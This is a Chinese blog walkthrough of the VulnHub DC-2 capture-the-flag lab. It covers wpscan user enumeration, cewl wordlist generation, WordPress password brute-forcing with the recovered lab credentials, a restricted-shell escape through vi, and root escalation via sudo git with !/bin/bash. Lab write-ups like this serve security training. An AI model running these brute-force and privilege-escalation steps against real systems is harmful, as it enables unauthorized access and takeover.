vulnhub-DC 2靶机

vulnhub:DC: 2 ~ VulnHub

导入靶机,放在kali同网段,扫描

image-20240927115420731

靶机在192.168.81.12,扫描端口

image-20240927132045579

存在网站服务,访问,发现访问不到,做一下详细扫描

image-20240927132305239

似乎是提示我们要用域名dc-2,编辑hosts文件,访问,成功访问到

image-20240927132416986

网站首页有个flag条目,提示我们关于密码字典的信息

image-20240927132520090

先用wpscan扫描一下用户

wpscan --url http://dc-2 --enumerate p --enumerate t --enumerate u

image-20240927132616669

找到三个用户,根据之前条目的提示默认字典不管用,需要我们从网站获取

cewl http://dc-2/ > password

现在生成了一个密码字典,为了能够爆破我们写一个用户名字典users,然后用wpscan爆破

wpscan --url http://dc-2 -U users -P password

image-20240927133103850

最终找到了jerry和tom的密码

jerry:adipiscing

tom:parturient

先用jerry的账户登录,找到了第二个flag,提示我们找第二个入口

image-20240927133446732

之前找到7744端口是ssh服务,尝试登录

jerry不行,但是tom可以

image-20240927133627833

这个shell不完整,只能用部分命令,尝试生成一个正常的shell,因为可以使用vi,所以可以在家目录下写一个.exrc文件,内容

image-20240927140517758

保存后再打开vi,输入

image-20240927140547015

然后导入环境变量

export PATH=/bin:/usr/bin:$PATH

export SHELL=/bin/bash:$SHELL

现在这个shell就可以执行大部分命令

image-20240927140702679

家目录下有flag3,查看

image-20240927140723800

提示让我们切换账户,现在已知的只有jerry,尝试一下

image-20240927141557542

发现可以,明明刚才ssh就连不上

image-20240927141649567

sudo -l显示我们可以用git,这个工具可以提权

sudo git help add

进入后输入!/bin/bash

image-20240927142747948

提权成功,flag在root目录

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值